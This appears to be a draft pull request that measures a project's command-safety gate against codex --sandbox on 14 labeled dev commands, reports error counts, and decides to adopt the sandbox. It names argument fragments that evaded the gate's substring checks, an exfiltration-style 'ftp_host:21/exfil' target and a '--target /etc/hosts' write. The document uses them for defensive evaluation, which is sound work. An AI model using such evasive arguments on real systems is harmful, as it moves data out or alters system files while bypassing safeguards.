Measure gate vs codex --sandbox: cede dev gate to off-the-shelf #7

Draft
moonweave wants to merge 1 commit into main from measure/gate-vs-sandbox

@moonweave

Contributor

What

Runs the decisive measurement the philosophy review demanded before building the gate-precision redesign (PR #6, now closed): keelplane's command-safety gate vs codex --sandbox, scored on false-pass (an unsafe command is allowed) and false-stop (a safe command is blocked).

  • measurements/gate_vs_sandbox.py — n=14 hand-labeled dev commands. keelplane verdict from the real assess_command_safety (deterministic, not a guess); codex verdict from --sandbox workspace-write OS rules (network deny + out-of-tree-write block).
  • docs/keelplane-gate-vs-sandbox-measurement.md — decision record.
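The scoring described above can be sketched roughly as follows. This is a minimal illustration, not the contents of measurements/gate_vs_sandbox.py: the names `LabeledCommand` and `score`, the three sample commands, and the echo-only gate are all hypothetical, and the real script takes its keelplane verdict from assess_command_safety rather than from a lambda.

```python
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class LabeledCommand:
    """A dev command plus its hand label (hypothetical structure)."""
    command: str
    safe: bool  # True if a correct gate should allow the command


def score(cases: Iterable[LabeledCommand], gate: Callable[[str], bool]) -> dict:
    """Tally correct / false-pass / false-stop for one gate.

    `gate(command)` returns True when the gate allows the command.
    """
    tally = {"correct": 0, "false_pass": 0, "false_stop": 0}
    for case in cases:
        allowed = gate(case.command)
        if allowed == case.safe:
            tally["correct"] += 1
        elif allowed:
            tally["false_pass"] += 1   # unsafe command was allowed
        else:
            tally["false_stop"] += 1   # safe command was blocked
    return tally


# Illustrative data only; these are not the 14 commands from the measurement.
cases = [
    LabeledCommand("echo hello", safe=True),
    LabeledCommand("pytest -q", safe=True),
    LabeledCommand("rm -rf /", safe=False),
]
# Stand-in gate that allows only commands starting with "echo".
result = score(cases, lambda cmd: cmd.startswith("echo"))
print(result)
```

Running the same labeled set through each gate's verdict function yields one row of the result table per gate, with total errors being false-pass plus false-stop.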

Result

| Gate | correct | false-pass | false-stop | total errors |
| --- | --- | --- | --- | --- |
| keelplane command-safety | 6 | 2 | 6 | 8 / 14 |
| codex --sandbox (workspace-write) | 12 | 0 | 2 | 2 / 14 |

codex --sandbox wins decisively. keelplane false-stops on plainly safe dev commands (git/pytest/pip blocked as non-allowlisted) and false-passes on args that evade its substring checks (ftp_host:21/exfil, --target /etc/hosts). This confirms the critics' claim that "off-the-shelf already wins."
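To make the two failure modes concrete, here is a toy gate that combines a program allowlist with a substring denylist. It is an assumption-laden sketch and not keelplane's assess_command_safety: `toy_gate`, both sets of rules, and the `synctool` program are invented for illustration, and only the argument strings ftp_host:21/exfil and --target /etc/hosts come from the measurement.

```python
import shlex

# Hypothetical rules, chosen only to reproduce the two failure modes.
ALLOWED_PROGRAMS = {"ls", "cat", "echo", "curl", "synctool"}
DENIED_SUBSTRINGS = ("ftp://", "> /etc/", ">/etc/")


def toy_gate(command: str) -> bool:
    """Return True if the command is allowed by the toy rules."""
    tokens = shlex.split(command)
    if not tokens:
        return False
    if tokens[0] not in ALLOWED_PROGRAMS:
        return False  # anything off the allowlist is blocked outright
    # Substring matching on the raw command text is easy to evade.
    return not any(s in command for s in DENIED_SUBSTRINGS)


# False-stop: safe dev commands are blocked because they are not allowlisted.
print(toy_gate("git status"))   # False
print(toy_gate("pytest -q"))    # False

# False-pass: the risky target never matches a denied substring.
print(toy_gate("curl -T notes.txt ftp_host:21/exfil"))  # True
print(toy_gate("synctool --target /etc/hosts"))         # True
```

An OS-level sandbox sidesteps both problems because it judges the effect of a command (network access, writes outside the workspace) rather than its text.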

Decision

Cede the dev gate + autonomous loop to off-the-shelf (codex --sandbox + thin allowlist + pre-push hook + git diff). keelplane's identity settles on discipline orchestration (design contract + adversarial-verify-against-source), applied to the dev domain. Resolves the direction-vs-domain tension.

🤖 Generated with Claude Code

…helf

Run the decisive measurement the philosophy review demanded *before* building
the gate-precision redesign (PR #6, now closed). n=14 hand-labeled dev commands;
the keelplane verdict comes from the real assess_command_safety (deterministic,
not a guess), the codex verdict from --sandbox workspace-write OS rules.

Result: codex --sandbox 2 errors vs keelplane command-safety 8 (6 false-stop on
plainly-safe dev commands blocked as non-allowlisted, 2 false-pass on
substring-evading args). This confirms the critics' prediction that the
off-the-shelf stack already wins, so keelplane's self-gate and autonomous
code-loop have no dev-domain edge and are ceded; its identity settles on
discipline orchestration (design contract + adversarial-verify-against-source).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>